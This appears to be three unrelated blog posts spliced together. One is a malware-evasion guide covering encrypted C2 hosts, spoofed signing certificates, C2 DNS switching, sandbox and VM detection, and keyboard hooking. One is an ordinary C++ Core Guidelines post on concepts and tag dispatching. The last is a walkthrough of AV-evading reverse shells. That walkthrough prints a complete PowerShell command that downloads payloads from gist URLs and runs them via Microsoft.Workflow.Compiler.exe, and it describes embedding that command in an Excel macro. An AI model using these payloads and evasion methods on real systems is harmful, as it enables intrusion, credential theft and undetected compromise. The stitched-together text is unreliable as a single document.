In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.

 

C++ Core Guidelines: Definition of Concepts, the Second

fern 821293 1280

Let’s assume; I defined the is_contiguous trait. In this case, I can use it to distinguish a random access iterator RA_iter from a contiguous iterator Contiguous_iter.

template<typename I>    // iterator providing random access
concept bool RA_iter = ...;

template<typename I>    // iterator providing random access to contiguous data
concept bool Contiguous_iter =
    RA_iter<I> && is_contiguous<I>::value;  // using is_contiguous trait

 

I can even wrap a tag class such as is_contiguous into a concept an use it. Now, I have a more straightforward expression of my idea contiguous iterator Contiguous_iter.

template<typename I> concept Contiguous = is_contiguous<I>::value;

template<typename I>
concept bool Contiguous_iter = RA_iter<I> && Contiguous<I>;

 

Okay, let me first explain two key terms: traits and tag dispatching.

Traits

Traits are class templates which extract properties from a generic type.

The following program presents for each of the 14 primary type categories of the type-traits library a type which satisfies the specific trait. The primary type categories are complete and don’t overlap. So each type is a member of a type category. If you check a type category for your type, the request is independent of the const or volatile qualifiers.

// traitsPrimary.cpp

#include <iostream>
#include <type_traits>

using namespace std;

template <typename T>
void getPrimaryTypeCategory(){

  cout << boolalpha << endl;

  cout << "is_void<T>::value: " << is_void<T>::value << endl;
  cout << "is_integral<T>::value: " << is_integral<T>::value << endl;
  cout << "is_floating_point<T>::value: " << is_floating_point<T>::value << endl;
  cout << "is_array<T>::value: " << is_array<T>::value << endl;
  cout << "is_pointer<T>::value: " << is_pointer<T>::value << endl;
  cout << "is_reference<T>::value: " << is_reference<T>::value << endl;
  cout << "is_member_object_pointer<T>::value: " << is_member_object_pointer<T>::value << endl;
  cout << "is_member_function_pointer<T>::value: " << is_member_function_pointer<T>::value << endl;
  cout << "is_enum<T>::value: " << is_enum<T>::value << endl;
  cout << "is_union<T>::value: " << is_union<T>::value << endl;
  cout << "is_class<T>::value: " << is_class<T>::value << endl;
  cout << "is_function<T>::value: " << is_function<T>::value << endl;
  cout << "is_lvalue_reference<T>::value: " << is_lvalue_reference<T>::value << endl;
  cout << "is_rvalue_reference<T>::value: " << is_rvalue_reference<T>::value << endl;

  cout << endl;

}

int main(){
    
    getPrimaryTypeCategory<void>();              // (1)
    getPrimaryTypeCategory<short>();             // (1)
    getPrimaryTypeCategory<double>();
    getPrimaryTypeCategory<int []>();
    getPrimaryTypeCategory<int*>();
    getPrimaryTypeCategory<int&>();
    struct A{
        int a;
        int f(double){return 2011;}
    };
    getPrimaryTypeCategory<int A::*>();
    getPrimaryTypeCategory<int (A::*)(double)>();
    enum E{
        e= 1,
    };
    getPrimaryTypeCategory<E>();
    union U{
      int u;
    };
    getPrimaryTypeCategory<U>();
    getPrimaryTypeCategory<string>();
    getPrimaryTypeCategory<int * (double)>();
    getPrimaryTypeCategory<int&>();              // (2)         
    getPrimaryTypeCategory<int&&>();             // (2)
    
}

 

I don’t want to bore you to death. Therefore, there is only the output of the lines (1).

traitsPrimary1

And here is the output of the lines (2).

traitsPrimary2

Tag Dispatching

Tag dispatching enables it to choose a function based on the properties of its types. The decision takes place at compile time and traits which I explained the last paragraph are used.

A typical example of tag dispatching is the std::advance algorithm from the Standard Template Library. std::advance(it, n)increments the iterator it by n elements. The program shows you the key idea.

 

// advanceTagDispatch.cpp

#include <iterator>
#include <forward_list>
#include <list>
#include <vector>
#include <iostream>

template <typename InputIterator, typename Distance>
void advance_impl(InputIterator& i, Distance n, std::input_iterator_tag) {
	std::cout << "InputIterator used" << std::endl; 
    while (n--) ++i;
}

template <typename BidirectionalIterator, typename Distance>
void advance_impl(BidirectionalIterator& i, Distance n, std::bidirectional_iterator_tag) {
	std::cout << "BidirectionalIterator used" << std::endl;
    if (n >= 0) 
        while (n--) ++i;
    else 
        while (n++) --i;
}

template <typename RandomAccessIterator, typename Distance>
void advance_impl(RandomAccessIterator& i, Distance n, std::random_access_iterator_tag) {
	std::cout << "RandomAccessIterator used" << std::endl;
    i += n;
}

template <typename InputIterator, typename Distance>
void advance_(InputIterator& i, Distance n) {
    typename std::iterator_traits<InputIterator>::iterator_category category;    // (1)
    advance_impl(i, n, category);                                                // (2)
}
  
int main(){
    
    std::cout << std::endl;
    
    std::vector<int> myVec{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myVecIt = myVec.begin();                                                // (3)
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    advance_(myVecIt, 5);
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    
    std::cout << std::endl;
    
    std::list<int> myList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myListIt = myList.begin();                                              // (4)
    std::cout << "*myListIt: " << *myListIt << std::endl;
    advance_(myListIt, 5);
    std::cout << "*myListIt: " << *myListIt << std::endl;
    
    std::cout << std::endl;
    
    std::forward_list<int> myForwardList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myForwardListIt = myForwardList.begin();                                // (5)
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    advance_(myForwardListIt, 5);
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    
    std::cout << std::endl;
    
}

 

The expression std::iterator_traits::iterator_category category determines the iterator category at compile time. Based on the iterator category the most specific variable of the function advance_impl(i, n, category) is used in line (2). Each container returns an iterator of the iterator category which corresponds to its structure. Therefore, line (3) gives a random access iterator, line (4) gives a bidirectional iterator, and line (5) gives a forward iterator which is also an input iterator.

advanceTagDispatchFrom the performance point of view, this distinction makes a lot of sense because a random access iterator can be faster incremented than a bidirectional iterator, and a bidirectional iterator can be faster incremented than an input iterator. From the users perspective, you invokestd::advance(it, 5) and you get the fastest version which your container satisfies.

This was quite verbose. I have not so much to add the two remaining rules.

T.25: Avoid complimentary constraints

The example from the guidelines shows complimentary constraints.

template<typename T> 
    requires !C<T> // bad 
void f(); 

template<typename T> 
    requires C<T> 
void f();

Avoid it. Make an unconstrained template and a constrained template instead.

 

template<typename T>   // general template
    void f();

template<typename T>   // specialization by concept
    requires C<T>
void f();

 

You can even set the unconstrained version to delete such that the constrained versions is only usable.

template<typename T>
void f() = delete;

 

T.26: Prefer to define concepts in terms of use-patterns rather than simple syntax

The title for this guideline is quite vague, but the example is self-explanatory.

Instead of using the concepts has_equal and has_not_equal to define the concept Equality

template<typename T> concept Equality = has_equal<T> && has_not_equal<T>;

 

use the usage-pattern. This is more readable than the previous version:

template<typename T> concept Equality = requires(T a, T b) {
    bool == { a == b }
    bool == { a != b }
    // axiom { !(a == b) == (a != b) }
    // axiom { a = b; => a == b }  // => means "implies"
}

 

The concept Equality requires in this case that you can apply == and != to the arguments and both operations return bool.

What’s next?

Here is a part of the opening from the C++ core guidelines to template interfaces: «…the interface to a template is a critical concept — a contract between a user and an implementer — and should be carefully designed.». You see, the next post is critical.

 

 

Thanks a lot to my Patreon Supporters: Eric Pederson, Paul Baxter,  Meeting C++, Matt Braun, Avi Lachmish, Roman Postanciuc, Venkata Ramesh Gudpati, Tobias Zindl, Mielo, Dilettant, and Marko.

Thanks in particular to:  TakeUpCode 450 60

Undetectable C# & C++ Reverse Shells

Index Attacks list:

  1. Open a simple reverse shell on a target machine using C# code and bypassing AV solutions.
  2. Open a reverse shell with a little bit of persistence on a target machine using C++ code and bypassing AV solutions.
  3. Open C# Reverse Shell via Internet using Proxy Credentials.
  4. Open Reverse Shell via C# on-the-fly compiling with Microsoft.Workflow.Compiler.exe.
  5. Open Reverse Shell via PowerShell & C# live compiling
  6. Open Reverse Shell via Excel Macro, PowerShell and C# live compiling

C# Simple Reverse Shell Code writing

Looking on github there are many examples of C# code that open reverse shells via cmd.exe. In this case i copied part of the codes and used the following simple C# program. No evasion, no persistence, no hiding code, only simple “open socket and launch the cmd.exe on victim machine”:

Simple Reverse shell C# code

Source code link: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Kali Linux in listening mode

I put my kali in listening mode on 443 port with netcat, compiled and executed my code.

Scan the exe file with no Threats found

As you can see the .exe file is clean for Windows Defender. From AV side no malicious actions ware already performed. This could be a standard results.

file execution on victim machine

Executing file the cmd instance is visible to the user and if the prompt window will be closed the same will happen for the shell.

Running reconnaissance commands on victim machine from Kali Linux

Running the exe file will spawn immediately the shell on my Kali.

VIRUS TOTAL RESULT

https://www.virustotal.com/#/file/983fe1c7d4cb293d072fcf11f8048058c458a928cbb9169c149b721082cf70aa/detection

C++ Reverse Shell with a little bit of persistence

Trying to go deeper i found different C++ codes with the same goal of the above reverse shell but one has aroused my attention. In particular i founded @NinjaParanoid’s code that opens a reverse shell with a little bit of persistence. Following some details of the code. For all the details go to the original article.

This script has 3 main advantages:

  • while loop that try to reconnect after 5 seconds
  • invisible cmd instance
  • takes arguments if standard attackers ip change
while loop that wait 5 seconds before running
main details
Windows Defender .exe scan

After compiling the code I analyzed it with Windows Defender and no threats were detected. At this time the exe behavior begins to be a bit borderline between malicious and non. As you can imagine as soon as you run the file the shell will be opened after 5 seconds in “silent mode”.

view from attacker’s machine

From user side nothing appears on screen. There is only the background process that automatically reconnects to the Kali every 5 sec if something goes wrong.

view from victim’s machine

VIRUS TOTAL RESULT

VT result

https://www.virustotal.com/#/file/a7592a117d2ebc07b0065a6a9cd8fb186f7374fae5806a24b5bcccd665a0dc07/detection

Open C# Reverse Shell via Internet using Proxy Credentials

Reasoning on how to exploit the proxy credentials to open a reverse shell on the internet from an internal company network I developed the following code:

  • combine the peewpw script to dump Proxy credentials (if are present) from Credential Manager without admin privileges
  • encode the dumped credentials in Base64
  • insert them into Proxy authorization connect.

… and that’s it…

Part of WCMDump code
code related to the proxy connection

…before compile the code you need only the Proxy IP/PORT of the targeted company. For security reason i cannot share the source code for avoid the in the wild exploitation but if you have a little bit of programming skills you will write yourself all the steps chain. Obviously this attack has a very high failure rate because the victim may not have saved the domain credentials on the credential manager making the attack ineffective.

Also in this case no threats were detected by Windows Defender and other enterprise AV solutions.

Thanks to @SocketReve for helping me to write this code.

Open Reverse Shell via C# on-the-fly compiling with Microsoft.Workflow.Compiler.exe

Passing over and looking deeper i found different articles that talks about arbitrary, unsigned code execution in Microsoft.Workflow.Compiler.exe. Here the articles: 123.

As a result of these articles I thought … why not use this technique to open my reverse shell written in C#?

In short, the articles talk about how to abuse the Microsoft.Workflow.Compiler.exe service in order to compile C# code on-the-fly. Here an command example:

standard Microsoft.Workflow.Compiler.exe command line

The REV.txt must need the following XOML structure:

REV.txt XOML code

Below you will find the RAW structure of the C# code that will be compiled (same of the C# reverse shell code described above):

Rev.Shell code

After running the command, the following happens:

  1. Not fileless: the C# source code is fetched from the Rev.Shell file.
  2. Fileless: the C# payload is compiled and executed.
  3. Fileless: the payload opens the reverse shell.
Kali with a simple 443 port in listening
Some commands executed from attacker to victim machine

Open Reverse Shell via PowerShell & C# live compiling

At this point I thought … what could be the next step to evolve this attack to something more usable in a red team or in a real attack?

Easy… to give Microsoft.Workflow.Compiler.exe the files to compile, why not use PowerShell? …and here we are:

powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
prompt command line on a victim machine

With this command the PS will download the two files described above and save them on the file system. Immediately afterwards it will abuse the Microsoft.Workflow.Compiler.exe to compile the C # live code and open the reverse shell. Following the gist links:

PowerShell Commands: https://gist.githubusercontent.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f/raw/7806b5c9642bdf39365c679addb28b6d19f31d76/PowerShell_Command.txt

REV.txt code — Rev.Shell code

Once the PS is launched the reverse shell will be opened without any detection.

Attacker view

Open Reverse Shell via Excel Macro, PowerShell and C# live compiling

As the last step of this series of attacks I tried to insert within a macro the Powershell code just described … and guess what?

The file is not detected as malicious and the reverse shell is opened without any alert.

Macro’s code
Scan result
Reverse shell on a victim machine

VIRUS TOTAL RESULT

https://www.virustotal.com/#/file/e81fe80f61a276d216c726e34ab0defc6e11fa6c333c87ec5c260f0018de89b4/detection

Many of the detections concern the macro that launch powershell and not for the actual behavior of the same. This means that if an attacker were able to obfuscate the code for not being detected or used other service to download the two files it could, without being detected, open a reversed shell as shown above.

Conclusion

Through the opening of several reverse shells written in different ways, this article wants to show that actions at the limit between good and evil are hardly detected by antivirus on the market. The first 2 shells are completely undetectable for all the AV on the market. The signatures related to the malicious macro concern only generic powershell and not the real abuse of microsoft services.

Critically, the arbitrary code execution technique using Microsoft.Workflow.Compiler.exe relies only on the ability to call a command, not on PowerShell. There is no need for the attacker to use some known PowerShell technique that might be detected and blocked by a security solution in place. You gain benefits such as bypassing application whitelisting and new ways of obfuscating malicious behavior. That said, when abusing Microsoft.Workflow.Compiler.exe, a temporary DLL will be created and may be detected by anti-virus.